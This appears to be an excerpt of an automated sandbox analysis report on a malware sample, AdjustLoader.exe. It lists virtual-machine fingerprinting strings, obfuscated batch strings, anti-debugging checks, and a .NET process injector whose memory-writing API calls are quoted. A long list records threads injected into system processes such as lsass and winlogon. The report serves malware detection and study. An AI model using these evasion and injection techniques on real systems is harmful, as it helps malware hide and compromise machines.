%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%s%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%e%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%t%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP% GGfLdnNjrWNHmHzXyuIOdILAZUitiUBZAntHGCYCesLkhM
Source: Amcache.hve.11.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.11.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.11.dr Binary or memory string: \driver\vmci,\driver\pci
Source: powershell.exe, 00000012.00000002.2020721365.00000138001BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Amcache.hve.11.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lsass.exe, 00000039.00000000.2382818082.00000202C0379000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: svchost.exe, 0000003A.00000000.2385547395.000002A660662000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Amcache.hve.11.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: svchost.exe, 0000003E.00000000.2392601155.000002295CE00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000039.00000000.2382252553.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: AdjustLoader.exe, 00000000.00000002.1676383830.000001C8EF0EB000.00000004.00000800.00020000.00000000.sdmp, AdjustLoader.exe, 00000000.00000002.1676383830.000001C8EE6EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2018154793.0000027B002D2000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2018154793.0000027B0052E000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.00000258004F3000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.000002580047E000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.00000258002DE000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2403335664.00000258004FB000.00000004.00000001.00020000.00000000.sdmp, tmp6432.tmp.bat.0.dr, $nya-Loli.bat.8.dr Binary or memory string: %dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%s%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%e%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP%t%dkzXWLECYjiEmNJaOEBUpWWOwLudddnQTVpQSIqeYZcelNfOxyWSkpChoLAlrBzUVrKqyThfoxVpTSDJFFFEgvGDtiChhfNxAhjTcPqErQEMumnvhRFLVUNALgXqrZYjJyPMJJGQpbmpQTjgUgZpzcBFtIhVRamrSvdVxBMylOwUHyJSXQvkZJJHXjsaBKYoOVxvPoJttBeLFHXVZoYbEcrjLvYniMWAP% GGfLdnNjrWNHmHzXyuIOdILAZUitiUBZAntHGCYCesLkhMcIMpChCcgYUEMjfuaxuNgZnSqVwgKLWBsnRzGTsuwyguMcQOxKroPtFdvTZHLwsvbslyrGNhfarISSfoeHJZuIMZIOeMUKIZfLtuQsxRWjjOcW=COLCeNsbsGmQCBanusrChzLxMk
Source: dwm.exe, 0000003B.00000000.2390348324.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF78450 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_0000024D9FF78450
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF714A0 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 47_2_0000024D9FF714A0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF78450 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_0000024D9FF78450
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF787B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 47_2_0000024D9FF787B4
Source: C:\Windows\System32\conhost.exe Code function: 47_2_0000024D9FF7CD20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_0000024D9FF7CD20
Source: C:\Users\user\Desktop\AdjustLoader.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code contains process injector
Source: 51.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
.NET source code references suspicious native API functions
Source: 51.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 51.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 51.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 51.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 51.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 8180000
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC642E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC612E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AE2E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 61302E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AF232E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 67D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B392E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EBFD2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59042E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A9E72E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 73162E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4E862E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 473C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6F9D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 83BC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3F72E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A4152E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BDF32E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0262E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C9F32E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 645B2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B2A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F62E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2AB42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ADB2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1992E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25DA2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F5352E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F0D62E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FFB2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C2572E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8BA92E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 66902E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13EF2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D572E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 69B42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC742E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5DA72E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 199D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3892E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B82E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 40E42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6532E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27BC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B152E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 621A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F482E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B4B2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 683D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1352E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E262E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C5E2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5932E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC652E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 777C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 33B42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D0A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB4C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A642E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6CF32E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 641A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 49352E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60D82E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E7B2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A1602E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F7C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8152E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 52342E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9DA92E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7F232E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7AF92E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 80852E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A3142E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E53C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3DFA2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1BCE2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 762570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 902570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1052570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 532570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1032570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1082570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 762570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1222570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DB2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 702570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 502570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AC2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B32570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1502570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1302570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B82570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1212570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9E2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 902570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AA2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 692570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1112570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BF2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1352570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F52570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F92570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1142570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 622570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1212570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A52570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 192570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 152570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FD2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 832570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D22570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 902570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1252570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F42570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 172570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 942570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 622570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 692570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A22570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D32570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6E2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1062570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 182570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A02570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 442D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B1C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F9952E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D662E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 91452E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C3DC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C4F2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB62E64
